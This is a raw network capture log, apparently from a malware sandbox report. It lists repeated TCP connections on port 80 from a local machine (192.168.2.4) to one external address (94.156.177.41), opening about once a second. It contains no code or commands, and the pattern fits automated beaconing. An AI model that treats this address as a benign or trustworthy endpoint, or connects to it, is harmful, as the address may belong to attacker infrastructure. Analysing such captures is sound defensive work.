Jan 7, 2025 12:32:43.480918884 CET	49788	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:43.480918884 CET	49788	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:43.485712051 CET	80	49788	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:43.618115902 CET	49789	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:43.623039007 CET	80	49789	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:43.623112917 CET	49789	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:43.625214100 CET	49789	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:43.629977942 CET	80	49789	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:43.630024910 CET	49789	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:43.634859085 CET	80	49789	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:44.368278027 CET	80	49789	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:44.368310928 CET	80	49789	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:44.368376017 CET	49789	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:44.368432045 CET	49789	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:44.373198986 CET	80	49789	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:44.517612934 CET	49790	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:44.522655010 CET	80	49790	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:44.522747040 CET	49790	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:44.524878025 CET	49790	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:44.529629946 CET	80	49790	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:44.529691935 CET	49790	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:44.534554005 CET	80	49790	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:45.260442972 CET	80	49790	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:45.260531902 CET	49790	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:45.260551929 CET	80	49790	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:45.260596991 CET	49790	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:45.265357018 CET	80	49790	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:45.399280071 CET	49791	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:45.404417992 CET	80	49791	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:45.404485941 CET	49791	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:45.406728983 CET	49791	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:45.411777973 CET	80	49791	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:45.411818027 CET	49791	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:45.416610003 CET	80	49791	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:46.120095968 CET	80	49791	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:46.120111942 CET	80	49791	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:46.120172977 CET	49791	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:46.120218039 CET	49791	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:46.125040054 CET	80	49791	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:46.281068087 CET	49792	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:46.285933018 CET	80	49792	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:46.286652088 CET	49792	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:46.288589954 CET	49792	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:46.293401003 CET	80	49792	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:46.293457031 CET	49792	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:46.298285007 CET	80	49792	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:47.026279926 CET	80	49792	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:47.026355028 CET	80	49792	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:47.026386023 CET	49792	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:47.026626110 CET	49792	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:47.031148911 CET	80	49792	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:47.167046070 CET	49793	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:47.171920061 CET	80	49793	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:47.172008038 CET	49793	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:47.173974037 CET	49793	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:47.179080963 CET	80	49793	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:47.179130077 CET	49793	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:47.184211016 CET	80	49793	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:47.914865971 CET	80	49793	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:47.914987087 CET	80	49793	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:47.914989948 CET	49793	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:47.915066004 CET	49793	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:47.919800997 CET	80	49793	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:48.059319973 CET	49794	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:48.064145088 CET	80	49794	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:48.066673994 CET	49794	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:48.068721056 CET	49794	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:48.073527098 CET	80	49794	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:48.074620008 CET	49794	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:48.079456091 CET	80	49794	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:48.821242094 CET	80	49794	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:48.821373940 CET	49794	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:48.821407080 CET	80	49794	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:48.821547031 CET	49794	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:48.826184034 CET	80	49794	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:48.972311974 CET	49795	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:48.977732897 CET	80	49795	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:48.977921963 CET	49795	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:48.979871988 CET	49795	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:48.984630108 CET	80	49795	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:48.984689951 CET	49795	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:48.989559889 CET	80	49795	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:49.713093996 CET	80	49795	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:49.713180065 CET	80	49795	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:49.713192940 CET	49795	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:49.713224888 CET	49795	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:49.717962980 CET	80	49795	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:49.850661039 CET	49796	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:49.855456114 CET	80	49796	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:49.855542898 CET	49796	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:49.857615948 CET	49796	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:49.862410069 CET	80	49796	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:49.862472057 CET	49796	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:49.867280006 CET	80	49796	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:50.609062910 CET	80	49796	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:50.609169006 CET	80	49796	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:50.609302044 CET	49796	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:50.609327078 CET	49796	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:50.614088058 CET	80	49796	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:50.745088100 CET	49798	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:50.749927998 CET	80	49798	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:50.750747919 CET	49798	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:50.752672911 CET	49798	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:50.757401943 CET	80	49798	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:50.758629084 CET	49798	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:50.763410091 CET	80	49798	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:51.495048046 CET	80	49798	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:51.495120049 CET	80	49798	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:51.495137930 CET	49798	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:51.495162010 CET	49798	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:51.499943018 CET	80	49798	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:51.643075943 CET	49799	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:51.647857904 CET	80	49799	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:51.647922993 CET	49799	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:51.650327921 CET	49799	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:51.655108929 CET	80	49799	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:51.655149937 CET	49799	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:51.659898996 CET	80	49799	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:52.422197104 CET	80	49799	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:52.422244072 CET	80	49799	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:52.422353983 CET	49799	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:52.422435999 CET	49799	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:52.427146912 CET	80	49799	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:52.555294037 CET	49800	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:52.560137987 CET	80	49800	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:52.562263012 CET	49800	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:52.562263012 CET	49800	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:52.567028046 CET	80	49800	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:52.567085028 CET	49800	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:52.571862936 CET	80	49800	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:53.323579073 CET	80	49800	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:53.323678970 CET	49800	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:53.323688984 CET	80	49800	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:53.323735952 CET	49800	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:53.328634977 CET	80	49800	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:53.465456009 CET	49801	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:53.470395088 CET	80	49801	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:53.470464945 CET	49801	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:53.472599030 CET	49801	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:53.479583979 CET	80	49801	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:53.479624987 CET	49801	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:53.484376907 CET	80	49801	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:54.426455021 CET	80	49801	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:54.426552057 CET	49801	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:54.426630974 CET	80	49801	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:54.426687002 CET	49801	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:54.431308985 CET	80	49801	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:54.572699070 CET	49803	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:54.577450991 CET	80	49803	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:54.577538013 CET	49803	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:54.579602957 CET	49803	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:54.584427118 CET	80	49803	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:54.584481001 CET	49803	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:54.589190006 CET	80	49803	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:55.294728041 CET	80	49803	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:55.294744968 CET	80	49803	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:55.294817924 CET	49803	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:55.301801920 CET	80	49803	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:55.434415102 CET	49804	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:55.439234972 CET	80	49804	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:55.439332008 CET	49804	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:55.441423893 CET	49804	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:55.446171045 CET	80	49804	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:55.446640968 CET	49804	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:55.451416969 CET	80	49804	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:56.184849024 CET	80	49804	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:56.184931993 CET	80	49804	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:56.184947968 CET	49804	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:56.184969902 CET	49804	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:56.189745903 CET	80	49804	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:56.321898937 CET	49810	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:56.326725006 CET	80	49810	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:56.326797962 CET	49810	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:56.328866005 CET	49810	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:56.333759069 CET	80	49810	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:56.333833933 CET	49810	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:56.338625908 CET	80	49810	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:57.071692944 CET	80	49810	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:57.071755886 CET	80	49810	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:57.071830988 CET	49810	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:57.071871042 CET	49810	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:57.078314066 CET	80	49810	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:57.225609064 CET	49816	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:57.230422020 CET	80	49816	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:57.230504990 CET	49816	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:57.232475996 CET	49816	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:57.237248898 CET	80	49816	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:57.237308979 CET	49816	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:57.242152929 CET	80	49816	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:57.962167978 CET	80	49816	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:57.962248087 CET	80	49816	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:57.962291002 CET	49816	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:57.962354898 CET	49816	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:57.967103958 CET	80	49816	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:58.109059095 CET	49822	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:58.113850117 CET	80	49822	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:58.113923073 CET	49822	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:58.116379976 CET	49822	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:58.121129036 CET	80	49822	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:58.121179104 CET	49822	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:58.125999928 CET	80	49822	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:58.853651047 CET	80	49822	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:58.853777885 CET	80	49822	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:58.853827953 CET	49822	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:58.853852987 CET	49822	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:58.858820915 CET	80	49822	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:58.991285086 CET	49828	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:58.996074915 CET	80	49828	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:58.996201038 CET	49828	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:58.998151064 CET	49828	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:59.003479004 CET	80	49828	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:59.003526926 CET	49828	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:59.008280993 CET	80	49828	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:59.720252037 CET	80	49828	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:59.720354080 CET	49828	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:59.720401049 CET	80	49828	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:59.720460892 CET	49828	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:59.725631952 CET	80	49828	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:59.867017031 CET	49837	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:59.871812105 CET	80	49837	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:59.871882915 CET	49837	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:59.874048948 CET	49837	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:59.878860950 CET	80	49837	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:59.878899097 CET	49837	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:59.883693933 CET	80	49837	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:00.607234955 CET	80	49837	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:00.607271910 CET	80	49837	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:00.607397079 CET	49837	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:00.607397079 CET	49837	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:00.612312078 CET	80	49837	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:00.741080046 CET	49843	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:00.745939970 CET	80	49843	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:00.748003960 CET	49843	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:00.748003960 CET	49843	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:00.752837896 CET	80	49843	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:00.752916098 CET	49843	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:00.757694006 CET	80	49843	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:01.490128040 CET	80	49843	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:01.490262985 CET	80	49843	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:01.490314007 CET	49843	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:01.497617960 CET	49843	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:01.502408981 CET	80	49843	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:01.650482893 CET	49849	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:01.655236006 CET	80	49849	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:01.655293941 CET	49849	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:01.657417059 CET	49849	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:01.662220001 CET	80	49849	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:01.662273884 CET	49849	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:01.667234898 CET	80	49849	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:02.395831108 CET	80	49849	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:02.395926952 CET	80	49849	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:02.396007061 CET	49849	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:02.396050930 CET	49849	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:02.400863886 CET	80	49849	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:02.537677050 CET	49857	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:02.542591095 CET	80	49857	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:02.542663097 CET	49857	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:02.544653893 CET	49857	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:02.549427986 CET	80	49857	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:02.549470901 CET	49857	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:02.554238081 CET	80	49857	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:03.285850048 CET	80	49857	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:03.285927057 CET	80	49857	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:03.285970926 CET	49857	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:03.285995007 CET	49857	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:03.290839911 CET	80	49857	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:03.462819099 CET	49863	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:03.467781067 CET	80	49863	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:03.467902899 CET	49863	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:03.469852924 CET	49863	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:03.476130009 CET	80	49863	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:03.476176023 CET	49863	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:03.482533932 CET	80	49863	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:04.228163004 CET	80	49863	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:04.228307009 CET	80	49863	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:04.228379011 CET	49863	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:04.228429079 CET	49863	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:04.233932972 CET	80	49863	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:04.406363964 CET	49869	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:04.411245108 CET	80	49869	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:04.412720919 CET	49869	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:04.415663958 CET	49869	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:04.420433998 CET	80	49869	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:04.420628071 CET	49869	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:04.425352097 CET	80	49869	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:05.134998083 CET	80	49869	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:05.135087967 CET	49869	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:05.135118961 CET	80	49869	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:05.135163069 CET	49869	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:05.139877081 CET	80	49869	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:05.278178930 CET	49875	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:05.282953978 CET	80	49875	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:05.283031940 CET	49875	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:05.285053968 CET	49875	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:05.289798975 CET	80	49875	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:05.289916992 CET	49875	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:05.294703007 CET	80	49875	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:06.011332035 CET	80	49875	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:06.011426926 CET	49875	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:06.011795044 CET	80	49875	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:06.011837006 CET	49875	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:06.016217947 CET	80	49875	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:06.145920992 CET	49882	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:06.150787115 CET	80	49882	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:06.150860071 CET	49882	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:06.152837992 CET	49882	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:06.157651901 CET	80	49882	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:06.157706022 CET	49882	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:06.162524939 CET	80	49882	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:06.893781900 CET	80	49882	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:06.894026995 CET	80	49882	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:06.894211054 CET	49882	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:06.894798994 CET	49882	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:06.899543047 CET	80	49882	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:07.154788971 CET	49888	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:07.159559011 CET	80	49888	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:07.160630941 CET	49888	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:07.163446903 CET	49888	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:07.168262959 CET	80	49888	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:07.168337107 CET	49888	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:07.173115015 CET	80	49888	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:07.922079086 CET	80	49888	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:07.922122002 CET	80	49888	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:07.922188044 CET	49888	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:07.922239065 CET	49888	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:07.927128077 CET	80	49888	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:08.053467035 CET	49898	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:08.058278084 CET	80	49898	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:08.058351040 CET	49898	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:08.060486078 CET	49898	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:08.065268993 CET	80	49898	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:08.065315962 CET	49898	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:08.070409060 CET	80	49898	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:08.808722019 CET	80	49898	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:08.808830976 CET	80	49898	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:08.808854103 CET	49898	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:08.808938980 CET	49898	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:08.813925028 CET	80	49898	94.156.177.41	192.168.2.4
Jan 7, 2025 12:33:08.969389915 CET	49904	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:33:08.974257946 CET	80	49904	94.156.177.41	192.168.2.4
